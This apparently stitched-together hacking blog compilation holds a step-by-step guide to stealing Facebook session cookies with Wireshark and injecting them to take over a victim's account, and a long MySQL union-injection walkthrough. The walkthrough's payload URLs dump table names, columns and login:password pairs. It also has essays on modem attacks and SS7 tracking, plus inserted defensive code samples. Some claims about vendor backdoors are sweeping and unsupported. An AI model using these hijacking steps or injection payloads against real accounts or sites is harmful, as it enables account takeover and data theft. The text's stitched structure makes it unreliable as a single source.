HACK FACEBOOK BY COOKIE STEALING ENJOy.. (Adesh kolte )


Three days ago I finished the series on Gmail Session Hijacking and Cookie Stealing. Because of the tremendous response from readers, I decided to write a post on Facebook cookie stealing and session hijacking. Facebook session hijacking can also be accomplished with a very popular tool called Firesheep (on a Wi-Fi network only), which I won't explain here because I have already covered it in my post Facebook Hacking Made Easy With Firesheep.
In this tutorial I will explain how an attacker can capture your authentication cookies on a local area network and use them to hack your Facebook account. Before reading this tutorial I recommend part 1, part 2 and part 3 of my Gmail Session Hijacking and Cookie Stealing series, so that you have a better understanding of what I am doing here.
Gmail Cookie Stealing And Session Hijacking Part 1
Gmail Cookie Stealing And Session Hijacking Part 2
Gmail Cookie Stealing And Session Hijacking Part 3
Facebook Authentication Cookies

The cookie that Facebook uses to authenticate its users is called “datr”. If an attacker can get hold of your authentication cookies, all he needs to do is inject those cookies into his browser and he will gain access to your account. This is what a Facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account?

An attacker can use a variety of methods to steal your Facebook authentication cookies, depending on the network he is on. If an attacker is on a hub-based network, he would just sniff traffic with any packet sniffer and gain access to the victim's account.

If an attacker is on a switch-based network, he would use ARP poisoning to capture authentication cookies. If an attacker is on a wireless network, he just needs a simple tool called Firesheep to capture the authentication cookie and gain access to the victim's account.

In the example below I will explain how an attacker can capture your authentication cookies and hack your Facebook account with Wireshark.

Step 1 – First of all, download Wireshark from the official website and install it.

Step 2 – Next, open Wireshark, click on Analyze and then click on Interfaces.

Step 3 – Next, choose the appropriate interface and click on Start.

Step 4 – Continue sniffing for around 10 minutes.

Step 5 – After 10 minutes, stop the packet capture by going to the Capture menu and clicking on Stop.

Step 6 – Next, set the filter at the top left to http.cookie contains "datr". This filter will show all HTTP cookies containing the name datr, and datr, as we know, is the name of the Facebook authentication cookie.

Step 7 – Next, right-click on it and go to Copy – Bytes – Printable Text Only.

Step 8 – Next you'll want to open Firefox. You'll need both Greasemonkey and the Cookie Injector script. Now open Facebook.com and make sure that you are not logged in.

Step 9 – Press Alt+C to bring up the Cookie Injector and simply paste the cookie value into it.

Step 10 – Now refresh the page and voilà, you are logged in to the victim's Facebook account.
Note: This attack will only work if the victim is on an http:// connection, and even on https:// if end-to-end encryption is not enabled.
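As an added defensive check that is not part of the original post: the sniffing described above only works because the cookie is accepted over plain http. The Python snippet below parses Set-Cookie headers and reports cookies that lack the Secure, HttpOnly and SameSite attributes. The two headers it inspects are constructed for the demo, and the datr value in them is made up.

```python
from typing import Dict, List, Optional

# Constructed sample Set-Cookie headers for the demo; the datr value is made up
# and is not a real Facebook cookie.
SAMPLE_HEADERS = [
    "datr=1276721606-b7f94f97deadbeef; expires=Fri, 01 Jan 2027 00:00:00 GMT; "
    "path=/; domain=.facebook.com",
    "sid=5f2a9c; Path=/; Secure; HttpOnly; SameSite=Lax",
]


def parse_set_cookie(header: str) -> Dict[str, Optional[str]]:
    """Split one Set-Cookie header into its name, value and lower-cased attributes.

    Flag attributes such as Secure and HttpOnly carry no value and are stored as None.
    """
    pieces = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = pieces[0].partition("=")
    cookie: Dict[str, Optional[str]] = {"name": name.strip(), "value": value.strip()}
    for piece in pieces[1:]:
        key, has_value, val = piece.partition("=")
        cookie[key.strip().lower()] = val.strip() if has_value else None
    return cookie


def audit_cookie(header: str) -> List[str]:
    """Return the weaknesses that would let a sniffer or injected script reuse this cookie."""
    cookie = parse_set_cookie(header)
    name = cookie["name"]
    findings = []
    if "secure" not in cookie:
        findings.append(f"{name}: no Secure flag, so it is also sent over plain http and can be sniffed")
    if "httponly" not in cookie:
        findings.append(f"{name}: no HttpOnly flag, so injected script can read it")
    samesite = cookie.get("samesite")
    if samesite is None or samesite.lower() == "none":
        findings.append(f"{name}: SameSite missing or None, so it rides along on cross-site requests")
    return findings


def audit_headers(headers: List[str]) -> Dict[str, List[str]]:
    """Audit every Set-Cookie header and map cookie name -> list of findings."""
    return {parse_set_cookie(h)["name"]: audit_cookie(h) for h in headers}


if __name__ == "__main__":
    for cookie_name, problems in audit_headers(SAMPLE_HEADERS).items():
        print(cookie_name, "->", problems or ["no findings"])
```

Run against a site's real response headers (for example the output of curl -I), a cookie without Secure is the one a passive sniffer on the LAN can pick up; the other two flags limit what script injection and cross-site requests can do with it.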


Understanding This Technique Called MySQL Injection

ABSTRACT

It is known that computers and software are developed and designed by humans, and human error is a reflection of a mental response to a particular activity.
Did you know that numerous inventions and discoveries are due to mistakes?
There are levels of human performance based on the behaviour of that mental response. To put it more comprehensively: we humans tend to err, and for this reason we are also the best tool for finding these errors; even professional software for vulnerability analysis and scanning was written by us.

Understanding the MySQL Injection technique

One of the best-known attack techniques known to web developers is SQL Injection. It is the manipulation of a SQL statement through the variables that make up the parameters received by a server-side script, a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements into a query by manipulating the input data of an application.
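To make the mechanism concrete, here is an added example (not the author's code, and not the query.php script the walkthrough below targets) that reproduces the flaw in Python against an in-memory SQLite database standing in for MySQL. The tables noticias and usuarios, their columns and their rows are constructed for the demo. query_vulnerable pastes the ?string= parameter into the SQL text, so a union payload of the kind shown later on this page returns rows from a table the query never mentioned; query_safe validates the type and binds the value as a parameter, and the same payload yields nothing.

```python
import sqlite3
from typing import List, Tuple

# Constructed toy schema standing in for the MySQL database behind query.php;
# the table and column names follow the walkthrough, the rows are made up.
SCHEMA = """
CREATE TABLE noticias (id INTEGER, titulo TEXT, corpo TEXT);
CREATE TABLE usuarios (id INTEGER, login TEXT, senha TEXT);
INSERT INTO noticias VALUES (1, 'Welcome', 'first post');
INSERT INTO usuarios VALUES (1, '_Rafa_', 'fontes1337');
INSERT INTO usuarios VALUES (2, 'greyhats', 'fontes');
"""


def build_db() -> sqlite3.Connection:
    """Create the in-memory database used by the demo."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_vulnerable(conn: sqlite3.Connection, string: str) -> List[Tuple]:
    """The flawed pattern: the ?string= parameter is pasted straight into the SQL text."""
    sql = "SELECT id, titulo, corpo FROM noticias WHERE id = " + string
    return conn.execute(sql).fetchall()


def query_safe(conn: sqlite3.Connection, string: str) -> List[Tuple]:
    """Hardened form: validate the type, then bind the value as a parameter."""
    try:
        article_id = int(string)
    except ValueError:
        return []  # a numeric id can never carry SQL keywords
    sql = "SELECT id, titulo, corpo FROM noticias WHERE id = ?"
    return conn.execute(sql, (article_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "1 union all select id, login, senha from usuarios--"
    print("vulnerable:", query_vulnerable(db, payload))  # leaks the usuarios rows
    print("safe:", query_safe(db, payload))              # []
    print("safe, normal input:", query_safe(db, "1"))
```

The parameterised query is what stops the union: the database receives the statement and the value separately, so the value can never change the statement's shape. Type validation on top of that is what turns a failed attack into an empty result rather than a database error message that leaks table names, which is exactly the feedback the error-based steps below depend on.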

STEP BY STEP

Figure 1) Detecting.

Finding the number of columns: we test first until an error appears; once no error is produced, the column count has been found.

Figure 2) SQL error.

Host Information,
Version of MySQL system used on the server.

Figure 3) Host Information.


Figure 4) Location of the files

Current database used by the connection between the application (the “input”) and the MySQL server.

Figure 5) Users of MySQL.

Figure 6) Current Time.

Brute Force or Guessing

This applies to MySQL versions below 5.x.y, which have no information_schema.

Figure 7) Testing.

Dump
This applies to MySQL versions 5.x.y and above. [ 1st Method ]
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column ‘usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you’ at line 1

<>————————<>————————-<>————————–<>

[ 2nd Method ]

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column ‘CHARACTER_SETS’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘CHARACTER_SETS’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column ‘COLLATIONS’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘COLLATIONS’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column ‘usuarios’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘usuarios’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column ‘rafael’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael’ at line 1
—————————————————————————————————————————————————————————————————————————————-

Searching Column (s) of a given table
* Brute Force / Guessing
This applies to MySQL versions below 5.x.y, which have no information_schema.

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column ‘rafael1’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column ‘rafael1’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column ‘_Rafa_’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column ‘rafael1337’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘rafael1337’ at line 1

=————————–=————————–=————————–=————————–=

Dump
This applies to MySQL versions 5.x.y and above. [ 1st Method ]

“usuarios” hexadecimal -> “7573756172696f73”

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column ‘login,passwd,id,texto’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘login,passwd,id,texto’ at line 1

<>————————<>————————-<>————————–<>

[ 2nd Method ]

“usuarios” decimal -> “117,115,117,97,114,105,111,115”

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column ‘login’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘login’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column ‘passwd’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘passwd’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column ‘id’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘id’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
text
or
Unknown column ‘text’ in ‘where clause’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘text’ at line 1
—————————————————————————————————————————————————————————————————————————————-

Extracting data from the columns of a given table

http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column ‘_Rafa_ : fontes1337’ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_ : fontes1337’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column ‘_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec’ at line 1

=————————–=
http://%5Bsite%5D/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column ‘_RHA_ : infosec1337‘ in ‘field list’
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘_RHA_ : infosec1337’ at line 1

=————————–=

Concat 

group_concat() => joins the matching values from all rows into a single string (ASCII characters)
concat() => joins the values from a single row into one string (ASCII characters)
concat_ws() => joins values using the given separator

Hexadecimal 

0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only; I could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of this attack may provide unauthorized access to a restricted area while remaining imperceptible to the eye of an inexperienced developer; it may also allow the deletion of a table, compromising the entire application, among other effects. So I want to emphasize that this paper is for security researchers, and for developers to be careful and test their code.

CONCLUSION

Many companies publish important information on their websites and in their databases; information is the most valuable intangible asset. The question is how developers are dealing with this huge responsibility.
The challenge is to develop increasingly innovative sites together with mechanisms that provide security to users.
The purpose of this paper is to present what SQL Injection is, how applications are exploited, and techniques for testing, allowing the developer to build a more robust system and understand the vulnerability.

Hardening Wordpress Security By Monitoring Malicious User Activities

WordPress has become the most popular content management system; it drives more than 20% of the websites on the internet. Such popularity has also made WordPress a very popular hacker target, and as a matter of fact one can find ample information about WordPress security. But although there is a lot of information about WordPress security, the WordPress security community is missing out on something very important: WordPress monitoring and logging!

Why Logging and Monitoring is Important

Operating systems, network hardware and software all log everything that happens to a log file or some sort of auditing database. For example, Windows has the Event Viewer and Linux / Unix operating systems use syslog.

From time to time administrators analyse logs to ensure that everything is working properly and that everyone is playing by the rules, i.e. not trying to tamper with the system. In fact, analysing logs helps administrators identify suspicious behaviour and hence prevent malicious attacks.

Even in the case of an attack, logs come in handy. For example, if a website or server is hacked, administrators analyse the logs to trace the attack and identify the security hole the malicious hacker exploited to hack the website or server. Once the security hole has been identified, administrators can work with the development team or vendor to close it and ensure that it cannot be exploited again in the future.

Management also finds logs very handy because they allow it to track and monitor user activity and productivity. Monitoring of system and user activity is a must to ensure both user productivity and the security of the system.

Monitor WordPress Sites Activity

As with any other system, keeping an audit log of the activity on WordPress sites and blogs, especially WordPress multisite installations, is a must if you want to ensure the security of WordPress and also user productivity.

WP Security Audit Log

WP Security Audit Log is a free WordPress monitoring plugin that tracks all activity on WordPress and WordPress multisite websites, enabling administrators and WordPress owners to keep track of everything happening on their WordPress site, identify suspicious behaviour and prevent malicious hack attacks.

WP Security Audit Log logs an alert each time a user logs in or out and creates, modifies or deletes content such as blog posts, pages and custom post types. What makes WP Security Audit Log better than other monitoring and auditing plugins is its comprehensive WordPress alerts. For example, if some content is changed it does not simply issue a generic “content has been modified” alert, but specifically reports what has changed: it raises a different alert if a URL or category has changed, if the post status or visibility has changed, if the author, date, page template or parent has changed, and much more.

Apart from content activity it also monitors the WordPress installation and system. Below is a list of some of the activity that WP Security Audit Log monitors:

  • User profile changes; such as email, role and password changes
  • Widget changes; for example, an alert is generated if a new widget is created or existing widgets are moved, modified or deleted
  • Plugin changes; an alert is generated if a new plugin is installed or if an existing one has been updated or uninstalled
  • Theme monitoring; a new theme is installed or activated
  • WordPress system changes; WP Security Audit Log also monitors WordPress updates, permalink changes, administrator notification email changes, default user role changes etc.
  • Source code changes; an alert is raised if plugin or theme files are modified

Administrators can use the Audit Log Viewer, shown in the screenshot below, to view all the WordPress security alerts generated by the plugin while monitoring WordPress.


Detailed WordPress Alerts

As per the screenshot below, each WordPress alert generated by the plugin includes information about the actual change being reported, the user's WordPress username, avatar and role, the source IP, and the date and time.
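Collecting alerts is only useful if someone looks at them. The following Python script is an added example, not part of the article or of the plugin, showing the kind of rules an administrator might run over exported alerts: a burst of failed logins from one source IP, plugin or theme file edits by anyone who is not an administrator, and role changes that end in administrator. The records are constructed with the fields the article lists (time, username, role, source IP and what changed); the event names, users and addresses are made up, and no particular export format of the real plugin is assumed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

TIME_FORMAT = "%Y-%m-%d %H:%M:%S"


def alert(time: str, user: str, role: str, ip: str, event: str, target: str = "") -> Dict[str, str]:
    """Build one alert record with the fields the viewer shows (constructed shape)."""
    return {"time": time, "user": user, "role": role, "ip": ip, "event": event, "target": target}


# Constructed sample alerts; users, addresses and events are made up for the demo.
SAMPLE_ALERTS: List[Dict[str, str]] = [
    alert("2015-03-01 10:00:01", "unknown", "", "203.0.113.9", "login_failed", "admin"),
    alert("2015-03-01 10:00:05", "unknown", "", "203.0.113.9", "login_failed", "admin"),
    alert("2015-03-01 10:00:09", "unknown", "", "203.0.113.9", "login_failed", "admin"),
    alert("2015-03-01 10:00:14", "unknown", "", "203.0.113.9", "login_failed", "admin"),
    alert("2015-03-01 10:00:20", "unknown", "", "203.0.113.9", "login_failed", "admin"),
    alert("2015-03-01 10:01:40", "editor1", "editor", "198.51.100.4", "login_ok"),
    alert("2015-03-01 10:05:00", "editor1", "editor", "198.51.100.4", "file_modified",
          "wp-content/plugins/contact/contact.php"),
    alert("2015-03-01 11:30:00", "alice", "administrator", "198.51.100.7", "role_changed",
          "bob: subscriber -> administrator"),
    alert("2015-03-01 18:00:00", "unknown", "", "192.0.2.50", "login_failed", "bob"),
]


def failed_login_bursts(alerts: List[Dict[str, str]], threshold: int = 5,
                        window: timedelta = timedelta(minutes=5)) -> List[str]:
    """Return source IPs with at least `threshold` failed logins inside any `window`."""
    by_ip: Dict[str, List[datetime]] = defaultdict(list)
    for a in alerts:
        if a["event"] == "login_failed":
            by_ip[a["ip"]].append(datetime.strptime(a["time"], TIME_FORMAT))
    flagged = []
    for ip, times in by_ip.items():
        times.sort()
        # slide a window of `threshold` consecutive failures over the sorted times
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.append(ip)
                break
    return flagged


def file_edits_by_non_admins(alerts: List[Dict[str, str]]) -> List[str]:
    """Plugin or theme source edits made by anyone who is not an administrator."""
    return [f"{a['user']} edited {a['target']}" for a in alerts
            if a["event"] == "file_modified" and a["role"] != "administrator"]


def promotions_to_admin(alerts: List[Dict[str, str]]) -> List[str]:
    """Role changes whose new role is administrator."""
    return [f"{a['user']} changed role: {a['target']}" for a in alerts
            if a["event"] == "role_changed" and a["target"].endswith("administrator")]


def find_suspicious(alerts: List[Dict[str, str]]) -> List[str]:
    """Run every rule and return the combined list of findings."""
    findings = [f"password guessing from {ip}" for ip in failed_login_bursts(alerts)]
    findings += file_edits_by_non_admins(alerts)
    findings += promotions_to_admin(alerts)
    return findings


if __name__ == "__main__":
    for line in find_suspicious(SAMPLE_ALERTS):
        print(line)
```

The single failed login from 192.0.2.50 is not reported, which is the point of the threshold and window: a rule that fires on every failure is one the administrator stops reading.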

It is also possible to enable the Data Inspector from the plugin's settings to get more details about the reported alert, such as the file triggering the alert, the user's User-Agent string etc.

From the plugin settings administrators can also enable PHP alerts, so the plugin reports any PHP errors and warnings, enabling administrators to also keep track of PHP problems, which are typically created when a WordPress website is hacked.

It is also possible to disable any of the alerts, for example if you do not want to be alerted each time a user logs in or out, as seen in the screenshot below.


Delegation of WordPress Security Monitoring

By default only administrators can view the alerts, switch alerts on or off, modify alert pruning etc. It is also possible to allow specific users or roles to view the alerts or modify any of the plugin settings, as seen in the screenshot below.


WordPress Administrators Should Use WP Security Audit Log

It is impossible to track user activity and productivity, and to ensure the security of your WordPress site, unless you have WP Security Audit Log; such a plugin comes in very handy, especially if you have hundreds of users on your WordPress site, or multiple websites and a large number of users on a WordPress multisite installation.

Download WP Security Audit Log from the official WordPress plugin repository and visit the official WP Security Audit Log plugin page for more information about the plugin.

Common Attacks Against Modems by (Adesh kolte HaXor)

0x01: Introduction to Modems

The term DSL modem is technically used to describe “a modem which connects to a single computer, through a USB port, or is installed in a computer PCI slot”. The more common DSL router, which combines the functions of a DSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a “residential gateway”, a DSL router usually manages the connection and sharing of the DSL service in a home or small office network.

Most consumer DSL lines use one of several variations and varieties of Asymmetric DSL (ADSL). The “asymmetric” here means that more of the bandwidth of the line is dedicated to downstream (download) data than to upstream (upload) data. Hence download rates are faster than upload rates, since most users download much larger quantities of data than they upload. Because telephone lines were never designed to carry such high-frequency signals, DSL is distance-sensitive. The farther the modem is from the switching center, the longer the telephone wires, the weaker the signal, and the lower the data rate the modem can achieve. Users in metropolitan areas, close to switching centers, may have access to higher-rate service, up to 8 Mbit/s, than the expected rate for the same service in remote areas.

Reference: en.wikipedia.org/wiki/DSL_modem

0x02: Market Share

Modem manufacturers are mostly Chinese-based. Research shows that companies like ZTE & Huawei are doing very well and have gained enterprise router share in China over the past year. In China, ZTE was placed third in 2013 and 2014, with a dizzying rise this year compared with the popular consortium Cisco (which happens to be more secure). This is also due to the fact that Cisco's products are very costly and difficult for home users to afford.


0x03: Backups& Backdoors

All modems include backup files, mainly because of the need to restore the modem to its original state after a reset. However, knowing the direct link to the backup file puts the modem directly in danger. All an attacker has to do is request the backup file and view it; mostly this is juicy plain-text info that contains passwords and ISP configurations.

Knowing this, some vendors try to encrypt the contents of these files, so that downloading them would be useless to the attacker. But this isn't entirely impossible, as lots of vendors tend to use weak encryption mechanisms for the backup file, and research done by white hats such as Osanda Malith shows that. He, for example, provided a PoC tool to decrypt these rom-0 (backup) files from most modems, including ZTE and TP-Link.
Most of the Chinese vendors such as ZTE are banned from the US, one because they are incredibly insecure and two because they put in malicious backdoors to snoop and eavesdrop on individuals and organizations.

Lots of trusted companies such as TP-Link, Huawei and other Chinese companies have a record of placing backdoors in their products. These backdoors are normally in the form of open ports which, on connecting, would provide a reverse shell. The ports are often high-numbered to make them harder to detect.

One such example can be found here. This lets them capture sensitive files and sometimes sell them to the countries they reside in. This strategy is a great one for governments to spy on their citizens, and equally great as part of a cyber attack against a particular country. So, for example: a country could sell cheap backdoored modems to a target country, and in case the modems end up being used on military and sensitive systems, they have hit the jackpot.

0x04: Default Configuration details and Hardcoded Credentials

Apparently, all if not most modems come with very easy-to-guess password configurations. In fact, most of them are identical, like username: admin and password: admin. Most people do not change the configuration details and most ISPs leave this at the default.

This is amazingly good news for malicious users, because all they have to do is know the vendor and they can get their hands on it easily, using sites such as http://www.routerpasswords.com/ to extract the information.

0x05: XSRF and XSS

These are two of the most common flaws in the history of web security. Most ZTE modems do not use anti-XSRF tokens (used to prevent CSRF attacks) on any sensitive request.

XSS is even worse, because if someone finds an XSS flaw in any modem (which is likely), he can send that link to a logged-in administrator and perform any action on behalf of the admin; this could be done by stealing the XSRF token. An XSS could also allow session hijacking and other browser attacks.

XSRF flaws are more commonly found in modems than XSS because modems use HTTP authentication most of the time, so headers are the main thing the communication protocols use to authenticate one side to the other. This makes it harder for the modem to create and verify anti-CSRF tokens rather than simply comparing credentials.

Because of these flaws, or just because of careless development, it is sometimes possible to trick admins into changing passwords, issuing commands or easing access.
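What an anti-XSRF token actually does is easiest to see in code. The Python below is an added example, not code from any modem firmware or from this article: it mints a token bound to the session with an HMAC under a per-device secret (SERVER_KEY, assumed to be generated at boot rather than baked into the firmware image), and a password-change handler refuses requests that do not carry a token valid for that session. Because the browser attaches HTTP authentication headers automatically but cannot guess the token, a forged cross-site request fails the check.

```python
import hashlib
import hmac
import secrets
from typing import Dict

# Per-device secret; assumed to be generated once at boot and never shipped in the
# firmware image (this demo simply generates it at import time).
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Mint a token bound to this session: random nonce + HMAC(key, session:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_token(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    """Recompute the MAC for this session and compare it in constant time."""
    nonce, dot, mac = token.partition(".")
    if not dot or not nonce:
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def change_password(session_id: str, form: Dict[str, str]) -> int:
    """State-changing handler: the browser supplies the login automatically, but the
    token is only present if the form was rendered for this very session."""
    if not verify_token(session_id, form.get("csrf_token", "")):
        return 403  # forged or replayed request: no valid token for this session
    # ... apply form["new_password"] to the device configuration here ...
    return 200


if __name__ == "__main__":
    token = issue_token("session-A")
    print(change_password("session-A", {"new_password": "x", "csrf_token": token}))  # 200
    print(change_password("session-A", {"new_password": "x"}))                       # 403
    print(change_password("session-B", {"new_password": "x", "csrf_token": token}))  # 403
```

The token is embedded in every form the device renders and checked on every state-changing request; a GET that merely reads the status page needs none. Binding the HMAC to the session id is what stops a token lifted from one admin's session from being replayed in another.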

0x06: Social Engineering

What would you say if a blocked number called you and the caller told you that she is from your ISP and needs your credentials in order to add or maintain the new and revised 3G technology in your modem? Or even asked you to fix security flaws in your modem? You would surely never expect this to be a trick. I mean, why would you? And the next thing you know, she has snooped your configuration password. Knowing this password could mean (since lots of people reuse passwords) that she now has your email password, financial accounts, etc.

0x07: Exploit Databases

Many exploit databases hold juicy info about modems, including default configurations, XSRF/XSS/LFI flaws, logical issues and backdoors. So all you need to do is find the modem version and search exploit databases such as exploit-db.com, 1337day.com etc.

So say you found an exploit against a previous version of a modem, but not for the exact version. This doesn't necessarily mean yours isn't vulnerable to the particular exploit you found. In fact, most vendors use the same architecture to build the web interface of their modems, so one XSS on one model could mean XSS on all the vendor's other modems.

0x08: Eavesdropping

The lack of SSL usually means bad luck for modems, especially for office/public usage, because the admin is always at risk when accessing any file from the modem. The reason is that it is very easy to sniff ongoing traffic with tools like Wireshark.

The fact that modems use login protocols like HTTP authentication puts them in more danger, because when any file is requested the modem asks for the authentication header and the admin responds (mostly in Base64 form), and an attacker can easily sniff this and decode the communication.

Even when using SSL (note that very few modems use it), it can still be insecure and even pose more risk. Recently, a lot of attacks have been identified against SSL protocols, Heartbleed and POODLE to name a few.

0x09: Denial Of Service

Denial of Service is one of the most annoying things I can think of, next to a log-out CSRF. People with bad intentions can use this type of attack to stop a modem delivering internet access and sometimes even make the modem reset itself.

This is really crazy for people trying to do their job. The fact that this attack can easily be turned into an untraceable one can make your business day a big pain, just because you chose to use a vulnerable modem.

Most modems by design have no more than 25MB of storage and less than 2MB of RAM, with no DoS protections. This usually means they can handle only a limited amount of data in a given amount of time. All an attacker has to do is send more requests than the modem can handle, exhausting its memory and resulting in a DoS.

0x0A: Lack Of Updates

Modem users seldom receive updates for modems when critical vulnerabilities have been identified in the wild, and a lot of modems don't really have a mechanism for providing OTA (over-the-air) updates. A lot of the time users have to upgrade the firmware manually, which of course is not possible for people with little or no technical knowledge.

0x0B: Suggestions

  1. If you are an admin/user of a modem, try not to stay logged in, to make attacks like XSRF, XSS and clickjacking less effective.
  2. Do a little research about the modem model you are trying to buy. Google exploits for it and check whether it uses a secure connection (TLS); if it is vulnerable, why should you buy it? Look for another.
  3. Disable remote access to reduce the attacker's chances of gaining access over the internet; since most modem exploits require LAN access, it's a good thing to disable remote Telnet, web and even FTP access to the modem.
  4. Limit physical access. Because most modems have a physical hard-reset key/button, they should remain in a secured environment where only authorized people can reach them.

Tapping Into Mobile Networks’ Backbone.

Hackers are known to use all sorts of remote access tools to infiltrate cell phones, often by discovering vulnerabilities in an operating system platform like Android or Symbian, or even in SIM cards.
It is rarer to try to tap into the network infrastructure that routes the calls for the mobile operators themselves. However, new research indicates that one vile kind of network wiretapping is happening too, across the globe.

Across a range of operators, 0.07% of SS7 packets being routed across a network in Africa were deemed suspicious; in Asia the rate was 0.05% and in the Americas it was 0.026%, according to Dublin-based research firm Adaptive Mobile. While these are low percentages, they add up given the millions of SS7 packets being routed every day.

Location tracking is for now the most popular reason for exploiting the SS7 protocol. A survey of a handful of large mobile operators on each continent showed that hackers have been (ab)using a vital signalling protocol for routing cellular calls, known as SS7, to track the location of certain mobile users and, in some cases, listen in on calls.

Some network surveillance groups, like those based in Bulgaria and the Rayzone group, also act within the grey area of selling access to their SS7 exploitation platforms to governments and to other surveillance companies like Hacking Team.

The SS7 network is the foundation of how carrier operators work, and billions of dollars have been invested in its network architecture around the world.

Protect A Website From Being Defaced Or Hacked

A website defacement occurs when a hacker changes the visual appearance of a website, usually by replacing the website's index.html file with his own file, which may contain the hacker's message or anything related to it.

